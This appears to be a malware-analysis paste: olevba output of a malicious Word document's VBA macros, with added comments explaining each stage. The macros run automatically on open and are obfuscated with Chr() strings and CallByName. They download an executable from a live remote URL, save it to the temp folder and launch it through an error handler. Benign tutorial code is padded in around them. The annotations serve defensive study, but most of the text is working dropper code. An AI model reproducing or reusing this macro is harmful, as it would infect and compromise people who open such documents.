dynamoo

Malicious Word macro

Jul 6th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- elle01~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: elle01~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: elle01~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  ' Entry point: Word runs a macro named AutoOpen automatically when the document is opened (with macros enabled).
  18. Nip121ÖÊÂ3017 (700) ' hands off to the next stage; the callee never reads the argument 700
  19.  
  20. End Sub
  21.  
  22. Sub Nip121ÖÊÂ3017(FFFFF As Integer)
  23.  ' Pass-through stage: FFFFF is ignored; the only action is the call to baV5XhIz81 (defined in Module2).
  24. baV5XhIz81
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public X480smtBX7GP As String ' shared across modules: baV5XhIz81 (Module2) stores the drop path here, P4mfk1w0 later opens it
  41.  
  42.  
  43.  
  44. ' Listing 15.1. Using Automation to create a new Word document.
  45. '
  46.  
  47.  
  48.  
  49. Public Function P4mfk1w0(hFiXhEUGKyuh5 As String) ' Launch stage: opens the file whose path is held in X480smtBX7GP; the parameter hFiXhEUGKyuh5 is never read.
  50.  Set UORXlUXJ8 = WEydCTxsxt4(Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l" & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & "t" & Chr(105) & Chr(111) & Chr(110)) ' the Chr() run decodes to "Shell.Application"
  51. UORXlUXJ8.Open (X480smtBX7GP) ' Shell.Application.Open on the module-level path, i.e. the file written by S5keRrVDgCuXr
  52. End Function
  53. Sub CreateWordDocument()
  54.     Dim wordApp As Word.Application
  55.     ' NOTE(analysis): no visible macro calls this Sub. It looks like filler taken from a VBA tutorial listing, presumably to pad the module with benign-looking code; HCnjkdbhve is not declared anywhere in the visible listing.
  56.    ' Create the Word Application object
  57.    '
  58.    HCnjkdbhve.Application.StatusBar = "Creating Word Application object..."
  59.     Set wordApp = CreateObject("Word.Application")
  60.     '
  61.    ' Work with Word's Application object directly
  62.    '
  63.    With wordApp
  64.         '
  65.        ' Create a new document and add some text
  66.        '
  67.        HCnjkdbhve.Application.StatusBar = "Creating new Word document..."
  68.         .Documents.Add
  69.         .ActiveDocument.Paragraphs(1).Range.InsertBefore "This is an Automation test."
  70.         '
  71.        ' Save the document
  72.        '
  73.        HCnjkdbhve.Application.StatusBar = "Saving Word document..."
  74.         .ActiveDocument.SaveAs "C:\My Documents\OLETest.doc"
  75.         '
  76.        ' We're done, so quit Word
  77.        '
  78.        HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
  79.         .Quit
  80.     End With
  81.     Set wordApp = Nothing
  82.     HCnjkdbhve.Application.StatusBar = False
  83. End Sub
  84.  
  85. ' Listing 15.2. Using Automation to work with a Word document.
  86. '
  87. Public Function WEydCTxsxt4(ofuVzwV8M As String) ' Thin wrapper over CreateObject: every visible caller passes a ProgID assembled at run time from Chr() pieces, so no COM class name appears as a plain literal at the call sites.
  88.  Set WEydCTxsxt4 = CreateObject(ofuVzwV8M) ' returns the created COM object to the caller
  89. End Function
  90. Sub DocumentWordCount()
  91.     Dim wordDoc As Word.Document
  92.     ' NOTE(analysis): no visible macro calls this Sub. It appears to be tutorial filler surrounding the real helpers; HCnjkdbhve is not declared anywhere in the visible listing.
  93.    ' Get the Word Document object
  94.    '
  95.    HCnjkdbhve.Application.StatusBar = "Getting Word Document object..."
  96.     Set wordDoc = GetObject("C:\My Documents\OLETest.doc", "Word.Document")
  97.     '
  98.    ' Get the word count
  99.    '
  100.    HCnjkdbhve.Application.StatusBar = "Getting word count..."
  101.     MsgBox wordDoc.Name & " has " & wordDoc.Words.Count & " words."
  102.     '
  103.    ' We're done, so quit Word and release object variable
  104.    '
  105.    HCnjkdbhve.Application.StatusBar = "Shutting down Word..."
  106.     wordDoc.HCnjkdbhve.Application.Quit
  107.     Set wordDoc = Nothing
  108.     HCnjkdbhve.Application.StatusBar = False
  109. End Sub
  110.  
  111. Public Function S5keRrVDgCuXr(rCKhzY8Z5 As Variant, YVPfKl3km As String) ' Drop stage: writes the bytes in rCKhzY8Z5 to the file path YVPfKl3km.
  112. Dim x0YC6QLt: Set x0YC6QLt = WEydCTxsxt4(Chr(65) & Chr(100) & "o" & Chr(100) & Chr(98) & "." & "S" & Chr(116) & "r" & Chr(101) & "a" & "m") ' the Chr() run decodes to "Adodb.Stream"
  113.  ' The stream is never closed here; the function ends right after SaveToFile.
  114. With x0YC6QLt
  115.    .Type = 1 ' 1 = adTypeBinary, so the payload is written as raw bytes
  116.     .Open
  117.     .write rCKhzY8Z5
  118.     .savetofile YVPfKl3km, 2 ' 2 = adSaveCreateOverWrite: an existing file at that path is replaced
  119. End With
  120. End Function
  121. ' Listing 15.3. Using Automation to run a PowerPoint
  122. ' presentation slide show.
  123. '
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125. ANALYSIS:
  126. +------------+--------------+-----------------------------------------+
  127. | Type       | Keyword      | Description                             |
  128. +------------+--------------+-----------------------------------------+
  129. | Suspicious | Open         | May open a file                         |
  130. | Suspicious | Chr          | May attempt to obfuscate specific       |
  131. |            |              | strings                                 |
  132. | Suspicious | CreateObject | May create an OLE object                |
  133. | Suspicious | SaveToFile   | May create a text file                  |
  134. | Suspicious | Run          | May run an executable file or a system  |
  135. |            |              | command                                 |
  136. | Suspicious | Write        | May write to a file (if combined with   |
  137. |            |              | Open)                                   |
  138. +------------+--------------+-----------------------------------------+
  139. -------------------------------------------------------------------------------
  140. VBA MACRO Module2.bas
  141. in file: elle01~1.doc - OLE stream: u'Macros/VBA/Module2'
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. Sub GatherBudgetSheets()
  144.     Dim myCollection As New Collection
  145.    ' Dim ws As Worksheet
  146.  ' NOTE(analysis): no visible macro calls this Sub. ThisWorkbook/Worksheets are Excel objects inside a Word document project, which suggests filler copied from a tutorial rather than working code.
  147.     For Each ws In ThisWorkbook.Worksheets
  148.         If InStr(ws.Name, "Budget") Then
  149.             myCollection.Add Item:=ws, Key:=ws.Name
  150.         End If
  151.     Next 'ws
  152.    MsgBox "The custom collection contains " & _
  153.         myCollection.Count & " worksheets."
  154. End Sub
  155.  
  156. ' Listing 16.2. A procedure that clears all objects
  157.  
  158. ' from a custom collection.
  159. '
  160. Sub ClearCollection(coll As Collection) ' NOTE(analysis): not called by any visible macro; appears to be benign tutorial filler. Removes items from coll until it is empty.
  161.     Do While coll.Count > 0
  162.         coll.Remove Index:=1
  163.     Loop
  164. End Sub
  165.  
  166. ' Listing 16.3. Using an object in a custom class.
  167.  
  168. Sub baV5XhIz81()
  169.  ' Core downloader: HTTP GET of a remote .exe, write it under %TEMP%, then launch it from an error handler. Defender view: Word issuing an HTTP request, writing an .exe to the temp directory and opening it are the observable events.
  170. Set qKUOnuHCDX = WEydCTxsxt4("M" & Chr(105) & "c" & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
  171.  ' The ProgID above decodes to "Microsoft.XMLHTTP".
  172.  ' Next two lines: the string is built with a stray "<" (Chr(60)) inside "http://", which Replace then strips; presumably this defeats simple string matching. Decoded (defanged) IoC: hxxp://ozelduzensurucukursu[.]com/253/632.exe
  173. Hcwvewv = Chr(104) & Chr(116) & "t" & Chr(112) & ":" & Chr(47) & Chr(60) & Chr(47) & Chr(111) & Chr(122) & Chr(101) & Chr(108) & Chr(100) & Chr(117) & Chr(122) & Chr(101) & Chr(110) & Chr(115) & Chr(117) & "r" & Chr(117) & Chr(99) & Chr(117) & Chr(107) & Chr(117) & Chr(114) & "s" & Chr(117) & Chr(46) & Chr(99) & Chr(111) & "m" & Chr(47) & "2" & Chr(53) & "3" & Chr(47) & Chr(54) & "3" & Chr(50) & Chr(46) & "e" & Chr(120) & "e"
  174. Hcwvewv = Replace(Hcwvewv, Chr(60), "", 1, 1, vbTextCompare)
  175. CallByName qKUOnuHCDX, Chr(79) & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & "E" & "T" _
  176. , Hcwvewv _
  177. , _
  178. False
  179.  ' The CallByName above is equivalent to .Open "GET", <url>, False (a synchronous request); the method name is passed as a string so it never appears as an identifier.
  180. Set WigQ9SJdY = WEydCTxsxt4("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  181.  ' "WScript.Shell" above; the next line reads its Environment("Process") collection.
  182. Set QI4SQ0ILWyLNH = CallByName(WigQ9SJdY, Chr(69) & "n" & Chr(118) & "i" & Chr(114) & "o" & Chr(110) & "m" & "e" & "n" & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
  183.  ' Looks up the TEMP environment variable of the current process.
  184. roCrTtTn4bavbJ = QI4SQ0ILWyLNH(Chr(84) & Chr(69) & Chr(77) & Chr(80))
  185.  ' Drop path: %TEMP%\blogdynamoocom.exe, stored in the module-level X480smtBX7GP declared in Module1.
  186. X480smtBX7GP = roCrTtTn4bavbJ & "\" & Chr(98) & Chr(108) & "o" & Chr(103) & Chr(100) & Chr(121) & Chr(110) & Chr(97) & Chr(109) & "o" & Chr(111) & Chr(99) & "o" & Chr(109) & "." & "e" & "x" & Chr(101)
  187. Dim NGWFp3rv8t() As Byte
  188.  ' Send the request, read responseBody as bytes, and hand them to S5keRrVDgCuXr (Module1), which writes them to the drop path.
  189. CallByName qKUOnuHCDX, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
  190. NGWFp3rv8t = CallByName(qKUOnuHCDX, "r" & Chr(101) & "s" & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & "d" & "y", VbGet)
  191. S5keRrVDgCuXr NGWFp3rv8t, X480smtBX7GP
  192. On Error GoTo JlQwk75hS ' arms the handler that performs the launch
  193.     a = 356 / 0 ' deliberate division by zero: raises a run-time error so control jumps to JlQwk75hS
  194.     HHdhh.Hnjkvowve ' not reached, because the line above always errors; HHdhh is not defined in the visible listing
  195.   On Error GoTo 0
  196.  
  197. mE6JTzsE:
  198.   Exit Sub
  199. JlQwk75hS:
  200.   P4mfk1w0 ("VAJ7EpH77R5Tf") ' launch stage: P4mfk1w0 ignores this string and opens X480smtBX7GP via Shell.Application
  201. Resume mE6JTzsE
  202. End Sub
  203.  
  204.  
  205. '
  206. Sub CustomClassObjectTest() ' NOTE(analysis): not called by any visible macro; appears to be tutorial filler. newCustomer is never declared here because its Dim line below is commented out.
  207.     'Dim newCustomer As New CCustomer
  208.    With newCustomer
  209.         .Account = "12-3456"
  210.         .Name = "ACME Coyote Supplies"
  211.         .Address = "123 Wily Way"
  212.         'Set .Invoices = New CInvoices
  213.    End With
  214.     With newCustomer.Invoices
  215.         .Add CustAcct:=newCustomer.Account, Amt:=1234.56
  216.         .Add CustAcct:=newCustomer.Account, Amt:=432.1
  217.         MsgBox .Count
  218.     End With
  219. End Sub
  220.  
  221. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  222. ANALYSIS:
  223. +------------+------------+-----------------------------------------+
  224. | Type       | Keyword    | Description                             |
  225. +------------+------------+-----------------------------------------+
  226. | Suspicious | Chr        | May attempt to obfuscate specific       |
  227. |            |            | strings                                 |
  228. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  229. |            |            | function calls                          |
  230. +------------+------------+-----------------------------------------+